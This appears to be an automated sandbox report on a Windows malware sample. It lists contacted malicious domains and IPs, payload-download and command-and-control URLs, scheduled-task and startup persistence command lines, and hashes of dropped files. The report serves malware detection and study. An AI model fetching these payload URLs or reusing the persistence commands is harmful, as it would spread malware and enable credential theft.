d1u0l9f6kr1di3.cloudfront.net	13.32.87.38	true	false	0%, Virustotal, Browse
helsinki-dtc.com	194.67.87.38	true	false	3%, Virustotal, Browse
c.574859385.xyz	37.221.125.202	true	true	9%, Virustotal, Browse
iolo0.b-cdn.net	156.146.43.65	true	false	0%, Virustotal, Browse
note.padd.cn.com	176.97.76.106	true	false	1%, Virustotal, Browse
fp2e7a.wpc.phicdn.net	192.229.211.108	true	false	0%, Virustotal, Browse
bg.microsoft.map.fastly.net	199.232.210.172	true	false	0%, Virustotal, Browse
d68kcn56pzfb4.cloudfront.net	108.157.172.96	true	true	0%, Virustotal, Browse
www.google.com	192.178.50.36	true	false	0%, Virustotal, Browse
service-domain.xyz	3.80.150.121	true	true	11%, Virustotal, Browse
svc.iolo.com	20.157.87.45	true	false	0%, Virustotal, Browse
googlehosted.l.googleusercontent.com	142.250.64.193	true	false	0%, Virustotal, Browse
checkdata-1114476139.us-west-2.elb.amazonaws.com	44.239.127.146	true	false	0%, Virustotal, Browse
api4.check-data.xyz	unknown	unknown	true	7%, Virustotal, Browse
api.check-data.xyz	unknown	unknown	true	7%, Virustotal, Browse
westus2-2.in.applicationinsights.azure.com	unknown	unknown	true	0%, Virustotal, Browse
www.rapidfilestorage.com	unknown	unknown	true	2%, Virustotal, Browse
clients2.googleusercontent.com	unknown	unknown	true	0%, Virustotal, Browse
skrptfiles.tracemonitors.com	unknown	unknown	true	1%, Virustotal, Browse
download.iolo.net	unknown	unknown	true	0%, Virustotal, Browse
240216234727901.mjj.xne26.cfd	unknown	unknown	true	0%, Virustotal, Browse

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://helsinki-dtc.com/updates/yd/wrtzr_yt_a_1/win/version.txt?QBydZwkpsFKAFvVdHIWuWCRJuDNJzwnPw	false
https://monoblocked.com/385128/setup.exe	false
http://185.172.128.228/BroomSetup.exe	false
http://185.172.128.59/ISetup1.exe	false
http://api4.check-data.xyz/api2/google_api_ifi	false
https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000	true
http://185.172.128.76/3cd2b41cbde8fc9c.php	true
http://skrptfiles.tracemonitors.com/updates/yd/wrtzr_yt_a_1/win/version.txt?WgPZvcyXhSTVdehKKNnpLpnrTYhLSWhya	false
http://www.rapidfilestorage.com/updates/yd/wrtzr_yt_a_1/win/version.txt?TgRwmotRmvjanFwrAygiXReOJytNrSTXT	false
https://service-domain.xyz/google_ifi_ico.png?rnd=Zd3zh3ZT3XmF8YI2eYS_RGXB9UGXB3SGXB6CHXB7UGXB6FIXB4FHXB1SGXB9FIXB9HGXB6FIXB9JJXB0	false
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGO6Ir7EGIjBbMe3eQAtuCL3jg7g0TShqEj30UCC7_atPViR7K19ZkkguPUrDHWkhEYx3h598qBoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false
http://185.172.128.76/15f649199f40275b/sqlite3.dll	true
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGO6Ir7EGIjAT31A6jm3jiUbYeNNo7BDZAsX_AO4Yhqat1pygOlLCpUVzhhDggamCbrUDp4EqjUUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false
http://skrptfiles.tracemonitors.com/updates/yd/wrtzr_yt_a_1/win/version.txt	false
http://185.172.128.76/15f649199f40275b/softokn3.dll	true
http://www.rapidfilestorage.com/clrls/cl_rls.json	false
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGKSIr7EGIjD_gy0lEzxGmT4ruUn43olxNd26dv_6t9V1kHHuQNrJ-I6ufJvD3u2tO-YexKH-zpoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false
http://185.172.128.59/syncUpd.exe	false
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe	false
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGKSIr7EGIjBNN4QNigwzXQnWujQoDXOdTWRctX9-iQ2o60jrfBaHO86I3LesLUSwtQRWNww27-YyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false
http://185.172.128.76/15f649199f40275b/nss3.dll	true
http://185.172.128.228/ping.php?substr=one	false
http://185.172.128.76/15f649199f40275b/mozglue.dll	true
http://www.rapidfilestorage.com/updates/yd/wrtzr_yt_a_1/win/version.txt?tiEOSnvauSGeSrVtrRTjdcdKOYxLWZZtj	false
http://185.172.128.203/tiktok.exe	false
https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444	true
http://skrptfiles.tracemonitors.com/updates/yd/wrtzr_yt_a_1/win/version.txt?iTfjhKmMUWxsWdQYLjvpBrapSwfuaDFGe	false
http://www.rapidfilestorage.com/updates/yd/wrtzr_yt_a_1/win/version.txt	false
http://185.172.128.76/15f649199f40275b/msvcp140.dll	true
http://svc.iolo.com/__svc/sbv/DownloadManager.ashx	false
https://d68kcn56pzfb4.cloudfront.net/load/load.php?c=1000	false
http://helsinki-dtc.com/updates/yd/wrtzr_yt_a_1/win/version.txt?DBNgrjReMPwMuUWVmgNCxBVhWTyizBQlm	false
https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456	true
http://note.padd.cn.com/1/Package.zip	false
http://api.check-data.xyz/api2/google_api_ifi	false
https://www.google.com/async/newtab_promos	false
https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000	true

URLs from Memory and Binaries

Name	Source	Malicious
https://duckduckgo.com/chrome_newtab	u2xs.0.exe, 00000008.00000003.2253436670.0000000004307000.00000004.00000020.00020000.00000000.sdmp	false
https://duckduckgo.com/ac/?q=	u2xs.0.exe, 00000008.00000003.2253436670.0000000004307000.00000004.00000020.00020000.00000000.sdmp	false
http://www.vmware.com/0	run.exe, 0000000B.00000002.2396139985.0000000004223000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.2649003331.0000000004F92000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000048.00000002.2693112601.000000000335E000.00000004.00000020.00020000.00000000.sdmp	false
http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.	u2xs.3.exe, 0000000F.00000003.2644115463.00000000027A9000.00000004.00001000.00020000.00000000.sdmp, u2xs.3.exe, 0000000F.00000003.2644115463.0000000002746000.00000004.00001000.00020000.00000000.sdmp, u2xs.3.exe, 0000000F.00000003.2644115463.00000000027E4000.00000004.00001000.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000014.00000003.2384912240.00000262C10B0000.00000004.00000800.00020000.00000000.sdmp	false
http://www.indyproject.org/	i1.exe, 00000006.00000003.2342660108.00000000070C6000.00000004.00000020.00020000.00000000.sdmp, u2xs.3.exe, 0000000F.00000000.2324296887.000000000041C000.00000020.00000001.01000000.00000011.sdmp, u2xs.3.exe, 0000000F.00000003.2644115463.00000000027A2000.00000004.00001000.00020000.00000000.sdmp	false
http://185.172.128.76/15f649199f40275b/mozglue.dll0	u2xs.0.exe, 00000008.00000002.2984027332.00000000042B7000.00000004.00000020.00020000.00000000.sdmp	false
http://185.172.128.76/15f649199f40275b/nss3.dllyd4W	u2xs.0.exe, 00000008.00000002.2984027332.000000000427A000.00000004.00000020.00020000.00000000.sdmp	false
https://aka.ms/pscore6lB	powershell.exe, 00000007.00000002.2106716298.0000000004FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2728197053.000000000347B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2728197053.000000000346C000.00000004.00000800.00020000.00000000.sdmp	false
https://nuget.org/nuget.exe	powershell.exe, 00000007.00000002.2128872923.0000000006057000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000007.00000002.2106716298.0000000004FF1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000045.00000002.3265540539.0000000003041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2728197053.0000000003506000.00000004.00000800.00020000.00000000.sdmp	false
https://download.iolo.net/	svchost.exe, 00000014.00000002.3267383537.00000262C132B000.00000004.00000020.00020000.00000000.sdmp	false
http://185.172.128.76/3cd2b41cbde8fc9c.php75b90b663400cbd2dd87518c2b422-released0eb916a7849bfb9cf354	u2xs.0.exe, 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmp	false
http://www.mozilla.com/en-US/blocklist/	u2xs.0.exe, u2xs.0.exe, 00000008.00000002.3041646591.0000000068C8D000.00000002.00000001.01000000.00000018.sdmp	false
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000007.00000002.2106716298.0000000005146000.00000004.00000800.00020000.00000000.sdmp	false
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000007.00000002.2106716298.0000000005146000.00000004.00000800.00020000.00000000.sdmp	false
https://go.micro	powershell.exe, 00000007.00000002.2106716298.0000000005582000.00000004.00000800.00020000.00000000.sdmp	false
https://contoso.com/Icon	powershell.exe, 00000007.00000002.2128872923.0000000006057000.00000004.00000800.00020000.00000000.sdmp	false
https://d68kcn56pzfb4.cloudfront.net/l	powershell.exe, 00000007.00000002.2106716298.00000000053F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2106716298.000000000539C000.00000004.00000800.00020000.00000000.sdmp	true
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	u2xs.0.exe, 00000008.00000003.2253436670.0000000004307000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.ver)	svchost.exe, 00000014.00000002.3266126562.00000262C1286000.00000004.00000020.00020000.00000000.sdmp	false
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe1	svchost.exe, 00000014.00000002.3262669127.00000262BC500000.00000004.00000020.00020000.00000000.sdmp	false
http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection	run.exe, run.exe, 0000000B.00000002.2349814954.0000000000E0C000.00000002.00000001.01000000.0000000D.sdmp, run.exe, 0000000B.00000000.2283984146.0000000000E0C000.00000002.00000001.01000000.0000000D.sdmp, run.exe, 00000048.00000002.2689699687.0000000000E0C000.00000002.00000001.01000000.0000000D.sdmp, run.exe, 00000048.00000000.2605971027.0000000000E0C000.00000002.00000001.01000000.0000000D.sdmp	false
http://nsis.sf.net/NSIS_ErrorError	file.exe	false
https://www.ecosia.org/newtab/	u2xs.0.exe, 00000008.00000003.2253436670.0000000004307000.00000004.00000020.00020000.00000000.sdmp	false
http://www.symauth.com/cps0(	run.exe, 0000000B.00000002.2396139985.0000000004223000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.2649003331.0000000004F92000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000048.00000002.2693112601.000000000335E000.00000004.00000020.00020000.00000000.sdmp	false
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	u2xs.0.exe, 00000008.00000003.2483945937.00000000309C4000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/Pester/Pester	powershell.exe, 00000007.00000002.2106716298.0000000005146000.00000004.00000800.00020000.00000000.sdmp	false
http://91.215.85.66:9000/wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F	MSBuild.exe, 00000045.00000002.3265540539.00000000030D3000.00000004.00000800.00020000.00000000.sdmp	false
http://www.symauth.com/rpa00	run.exe, 0000000B.00000002.2396139985.0000000004223000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.2649003331.0000000004F92000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000048.00000002.2693112601.000000000335E000.00000004.00000020.00020000.00000000.sdmp	false
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	u2xs.0.exe, 00000008.00000003.2483945937.00000000309C4000.00000004.00000020.00020000.00000000.sdmp	false
http://www.info-zip.org/	run.exe, 0000000B.00000002.2396139985.00000000041CD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.2649003331.0000000004F49000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000048.00000002.2693112601.0000000003308000.00000004.00000020.00020000.00000000.sdmp	false
https://d68kcn56pzfb4.cloudfront.net	powershell.exe, 00000007.00000002.2106716298.000000000521E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2106716298.0000000005398000.00000004.00000800.00020000.00000000.sdmp	true
http://185.172.128.76	u2xs.0.exe, 00000008.00000002.2977205210.000000000425E000.00000004.00000020.00020000.00000000.sdmp	true
http://240216234727901.mjj.xne26.cfd	powershell.exe, 00000007.00000002.2106716298.00000000053BD000.00000004.00000800.00020000.00000000.sdmp	false
http://ocsp.sectigo.com0	i1.exe, 00000006.00000003.2342660108.00000000074B2000.00000004.00000020.00020000.00000000.sdmp	false
https://download.iolo.net/sm/	svchost.exe, 00000014.00000002.3258042818.000000765837B000.00000004.00000010.00020000.00000000.sdmp	false
https://contoso.com/License	powershell.exe, 00000007.00000002.2128872923.0000000006057000.00000004.00000800.00020000.00000000.sdmp	false
http://185.172.128.76/15f649199f40275b/freebl3.dllVA	u2xs.0.exe, 00000008.00000002.2984027332.00000000042B7000.00000004.00000020.00020000.00000000.sdmp	false
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	u2xs.0.exe, 00000008.00000003.2253436670.0000000004307000.00000004.00000020.00020000.00000000.sdmp	false
http://google.com	i1.exe, 00000006.00000003.2342660108.00000000070C6000.00000004.00000020.00020000.00000000.sdmp, u2xs.3.exe, 0000000F.00000000.2324296887.000000000041C000.00000020.00000001.01000000.00000011.sdmp	false
http://185.172.128.203/tiktok.exe00	u2xs.0.exe, 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmp	false
http://185.172.128.76M	u2xs.0.exe, 00000008.00000002.2977205210.000000000425E000.00000004.00000020.00020000.00000000.sdmp	false
http://d68kcn56pzfb4.cloudfront.net	powershell.exe, 00000007.00000002.2106716298.000000000539C000.00000004.00000800.00020000.00000000.sdmp	false
https://d68kcn56pzfb4.cloudfront.net/load/load.php?c=1000/silentget	file.exe, 00000000.00000002.2294644048.0000000000637000.00000004.00000020.00020000.00000000.sdmp	false
https://download.iolo.net:443/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.ex	svchost.exe, 00000014.00000002.3266550293.00000262C12C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3265336111.00000262C122C000.00000004.00000020.00020000.00000000.sdmp	false
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	u2xs.0.exe, 00000008.00000003.2253436670.0000000004307000.00000004.00000020.00020000.00000000.sdmp	false
https://contoso.com/	powershell.exe, 00000007.00000002.2128872923.0000000006057000.00000004.00000800.00020000.00000000.sdmp	false
https://sectigo.com/CPS0D	i1.exe, 00000006.00000003.2342660108.00000000074B2000.00000004.00000020.00020000.00000000.sdmp	false
http://185.172.128.76/15f649199f40275b/softokn3.dll(A	u2xs.0.exe, 00000008.00000002.2984027332.00000000042B7000.00000004.00000020.00020000.00000000.sdmp	false
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.06	u2xs.3.exe, 0000000F.00000003.2644115463.0000000002764000.00000004.00001000.00020000.00000000.sdmp	false
http://www.sqlite.org/copyright.html.	u2xs.0.exe, 00000008.00000002.3041370195.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, u2xs.0.exe, 00000008.00000002.3002159835.000000001E771000.00000004.00000020.00020000.00000000.sdmp	false
http://91.215.85.66:9000	MSBuild.exe, 00000045.00000002.3265540539.00000000030D3000.00000004.00000800.00020000.00000000.sdmp	false
http://nuget.org/NuGet.exe	powershell.exe, 00000007.00000002.2128872923.0000000006057000.00000004.00000800.00020000.00000000.sdmp	false
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	u2xs.0.exe, 00000008.00000003.2253436670.0000000004307000.00000004.00000020.00020000.00000000.sdmp	false
https://d68kcn56pzfb4.cloudfront.net/	file.exe, 00000000.00000003.2293734505.0000000000690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294644048.0000000000690000.00000004.00000020.00020000.00000000.sdmp	true
http://www.vmware.com/0/	run.exe, 0000000B.00000002.2396139985.0000000004223000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.2649003331.0000000004F92000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000048.00000002.2693112601.000000000335E000.00000004.00000020.00020000.00000000.sdmp	false
http://91.215.85.66:9000/wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4Fe	MSBuild.exe, 00000045.00000002.3259175365.000000000142C000.00000004.00000020.00020000.00000000.sdmp	false
https://d68kcn56pzfb4.cloudfront.net/load/load.php?c=1000y	file.exe, 00000000.00000002.2294986174.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	false
http://185.172.128.76/3cd2b41cbde8fc9c.phpt	u2xs.0.exe, 00000008.00000002.2984027332.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	false
https://pastebin.com/raw/z9pYkqPQ	MSBuild.exe, 00000045.00000002.3265540539.0000000003041000.00000004.00000800.00020000.00000000.sdmp	false
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe7C:	svchost.exe, 00000014.00000002.3262989705.00000262BC940000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2508792934.00000262C10B1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3264823009.00000262C11B0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3262669127.00000262BC500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2635085717.00000262C10BB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3267655915.00000262C1650000.00000004.00000800.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.172.128.90	unknown	Russian Federation	50916	NADYMSS-ASRU	true
185.172.128.228	unknown	Russian Federation	50916	NADYMSS-ASRU	false
192.178.50.36	www.google.com	United States	15169	GOOGLEUS	false
108.157.172.96	d68kcn56pzfb4.cloudfront.net	United States	16509	AMAZON-02US	true
185.172.128.203	unknown	Russian Federation	50916	NADYMSS-ASRU	false
37.221.125.202	c.574859385.xyz	Lithuania	62416	PTSERVIDORPT	true
20.157.87.45	svc.iolo.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
185.172.128.76	unknown	Russian Federation	50916	NADYMSS-ASRU	true
176.97.76.106	note.padd.cn.com	United Kingdom	43658	INTRAFFIC-ASUA	false
185.172.128.59	unknown	Russian Federation	50916	NADYMSS-ASRU	false
156.146.43.65	iolo0.b-cdn.net	United States	60068	CDN77GB	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
91.215.85.66	unknown	Russian Federation	34665	PINDC-ASRU	true
45.130.41.108	monoblocked.com	Russian Federation	198610	BEGET-ASRU	false

Private

IP
192.168.2.6
192.168.2.5
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1432200
Start date and time:	2024-04-26 17:10:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	79
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@176/111@23/17
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 87% Number of executed functions: 149 Number of non-executed functions: 234
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.45.182.83, 40.68.123.157, 192.229.211.108, 199.232.210.172, 13.95.31.18, 192.178.50.67, 192.178.50.35, 142.250.217.206, 173.194.211.84, 52.165.164.15, 34.104.35.123, 40.126.29.14, 40.126.29.12, 40.126.29.5, 40.126.29.11, 40.126.29.8, 40.126.29.9, 40.126.29.6, 40.126.29.13, 23.204.76.112, 52.168.117.173, 199.232.214.172, 20.9.155.150, 104.208.16.94, 142.250.189.142, 173.194.215.84, 192.178.50.74, 142.251.35.234, 142.250.217.170, 172.217.3.74, 172.217.165.202, 142.250.189.138, 172.217.15.202, 142.250.217.234, 142.250.217.202, 192.178.50.42, 142.250.64.170, 131.107.255.255
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, dns.msftncsi.com, gig-ai-prod-westus2-0.trafficmanager.net, clients2.google.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, gig-ai-prod-wus2-02-app-v4-tag.westus2.cloudapp.azure.com, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, onedsblobprdcus16.centralus.cloudapp.azure.com, optimizationguide-pa.googleapis.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, blobcollector.events.data.trafficmanager.net,
Execution Graph export aborted for target powershell.exe, PID 6980 because it is empty
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:10:55	API Interceptor	76x Sleep call for process: powershell.exe modified
17:11:30	API Interceptor	2x Sleep call for process: svchost.exe modified
17:11:39	API Interceptor	1x Sleep call for process: WMIC.exe modified
17:11:42	Task Scheduler	Run new task: biPxHmULFllsbMgnpt path: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe s>Wt /gCsdidCeBm 385128 /S
17:11:43	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\il_Plugin_v1.lnk
17:11:53	API Interceptor	1x Sleep call for process: cmd.exe modified
17:11:56	API Interceptor	751x Sleep call for process: MSBuild.exe modified
17:12:00	API Interceptor	1x Sleep call for process: WerFault.exe modified
17:12:14	API Interceptor	1x Sleep call for process: Install.exe modified
17:12:19	Task Scheduler	Run new task: yfARWRprRqUFWeTGf path: C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\SGcrFlL.exe s>aV /RtVadidBy 385128 /S
17:12:39	Task Scheduler	Run new task: beuYBzgGTLbmn2 path: C:\Windows\system32\forfiles.exe s>/p C:\Windows\system32 /m wscript.exe /c "cmd /C @FNAME ^"C:\ProgramData\pICeQFkDCDDquYVB\AuCxtJm.wsf^""
17:12:43	Task Scheduler	Run new task: vkFqb1 path: "C:\Program Files\Google\Chrome\Application\chrome.exe" s>--restore-last-session

QR Codes

Source	URL
Screenshot	http://

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
env-3936544.jcloud.kz	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.22.66.16
	file.exe	Get hash	malicious	Neoreklami	Browse	185.22.66.15
	Wj2H9uqRDZ.exe	Get hash	malicious	Neoreklami	Browse	185.22.66.16
	CGVYlOv.wsf	Get hash	malicious	Unknown	Browse	185.22.66.16
	file.exe	Get hash	malicious	Neoreklami	Browse	185.22.66.16
	file.exe	Get hash	malicious	Neoreklami	Browse	185.22.66.16
	file.exe	Get hash	malicious	Neoreklami	Browse	185.22.66.15
	file.exe	Get hash	malicious	Neoreklami	Browse	185.22.66.98
	file.exe	Get hash	malicious	Neoreklami	Browse	185.22.66.224
	file.exe	Get hash	malicious	Neoreklami	Browse	185.22.66.157

Process:	C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe
File Type:	Windows desktop.ini
Category:	dropped
Size (bytes):	129
Entropy (8bit):	5.323600488446077
Encrypted:	false
SSDEEP:	3:0NdQDjoqxyRVIQBU+1IVLfAPmBACaWZcy/FbBmedyn:0NwoSyzI2U8MAPVCawbBmeUn
MD5:	A526B9E7C716B3489D8CC062FBCE4005
SHA1:	2DF502A944FF721241BE20A9E449D2ACD07E0312
SHA-256:	E1B9CE9B57957B1A0607A72A057D6B7A9B34EA60F3F8AA8F38A3AF979BD23066
SHA-512:	D83D4C656C96C3D1809AD06CE78FA09A77781461C99109E4B81D1A186FC533A7E72D65A4CB7EDF689EECCDA8F687A13D3276F1111A1E72F7C3CD92A49BCE0F88
Malicious:	false
Reputation:	unknown
Preview:	[.ShellClassInfo]..CLSID={645FF040-5081-101B-9F08-00AA002F954E}..LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-8964..

C:\ProgramData\AQRFEVRTGL.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.691266297898928
Encrypted:	false
SSDEEP:	24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
MD5:	7D4E714F4EDA4631DCA8D420338392F1
SHA1:	536B4BCBAB5C780738EE2D562D16AB532C9D8E68
SHA-256:	841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
SHA-512:	FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
Malicious:	false
Reputation:	unknown
Preview:	AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

C:\ProgramData\ATJBEMHSSB.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
